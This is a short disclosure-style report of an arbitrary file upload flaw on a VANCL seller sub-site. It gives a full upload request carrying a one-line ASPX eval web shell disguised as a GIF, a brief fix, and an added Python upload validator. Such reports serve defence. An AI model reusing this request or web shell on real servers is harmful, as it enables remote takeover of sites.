Arbitrary File Upload on a Sub-site of Fanke (VANCL)
Details:
Sub-site address: http://seller.vancl.com/account/UserAccountview
Go to Account Authentication.
Upload a file, capture the request, and modify the packet... and it works.
POST /account/UploadIdImage HTTP/1.1
Host: seller.vancl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.5
Connection: keep-alive
Referer: http://seller.vancl.com/account/UserAccountview
Cookie: add it by yourself
Content-Type: multipart/form-data; boundary=---------------------------146043902153
Content-Length: 367

-----------------------------146043902153
Content-Disposition: form-data; name="ufile"; filename="xxx.aspx"
Content-Type: image/gif

GIF89a
<% @ Page Language = "Jscript" %> <% eval (Request. Item ["chopper"], "unsafe"); %>
-----------------------------146043902153
Content-Disposition: form-data; name="SubmitID"
......
-----------------------------146043902153--
Solution:
Deploy the file service separately from the application, and synchronize the uploaded files over to it.
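
The request above pairs an image Content-Type and a GIF89a header with an .aspx filename. As an added example (not part of the original report and not the site's code), this Python check ignores the client-declared type and decides on extension allowlist, magic bytes and script markers; the allowlist, function names and the sample part with its placeholder body are assumptions constructed for illustration.

```python
import os
import re

# Assumed policy for an ID-image upload endpoint (not taken from the page).
ALLOWED = {".gif": b"GIF8", ".png": b"\x89PNG\r\n\x1a\n",
           ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff"}
# Script-block markers; a detection heuristic, not a substitute for re-encoding.
SCRIPT_MARKERS = re.compile(rb"<%|<\?php|<script\b", re.IGNORECASE)

# Constructed sample shaped like the file part above, with an inert placeholder body.
SAMPLE_PART = (
    b'Content-Disposition: form-data; name="ufile"; filename="xxx.aspx"\r\n'
    b"Content-Type: image/gif\r\n\r\n"
    b"GIF89a\r\n<%-- constructed placeholder, not a working script --%>\r\n")


def parse_file_part(part: bytes):
    """Split one multipart/form-data part into (filename, declared_type, body)."""
    head, _, body = part.partition(b"\r\n\r\n")
    name = re.search(rb'filename="([^"]*)"', head)
    ctype = re.search(rb"(?im)^Content-Type:\s*([^\r\n;]+)", head)
    return (name.group(1).decode("latin-1") if name else "",
            ctype.group(1).decode("latin-1").strip().lower() if ctype else "",
            body)


def check_upload(filename: str, declared_type: str, body: bytes):
    """Return the reasons to reject an upload; an empty list means accept."""
    reasons = []
    # Strip path parts plus the trailing dots/spaces that Windows drops on save.
    name = os.path.basename(filename.replace("\\", "/")).rstrip(". ").lower()
    ext = os.path.splitext(name)[1]
    magic = ALLOWED.get(ext)
    if magic is None:
        reasons.append(f"extension {ext!r} not in allowlist")
        # The declared type is client-controlled: never a reason to accept,
        # but a mismatch is a useful signal for logging and alerting.
        if declared_type.startswith("image/"):
            reasons.append("declared image type contradicts extension")
    elif not body.startswith(magic):
        reasons.append("content does not match extension")
    if SCRIPT_MARKERS.search(body):
        reasons.append("server-side script marker in body")
    return reasons


if __name__ == "__main__":
    print(check_upload(*parse_file_part(SAMPLE_PART)))
```

An accepted file should still be stored under a server-generated name in a location where the web server does not execute scripts, which is what the separate file service in the Solution provides.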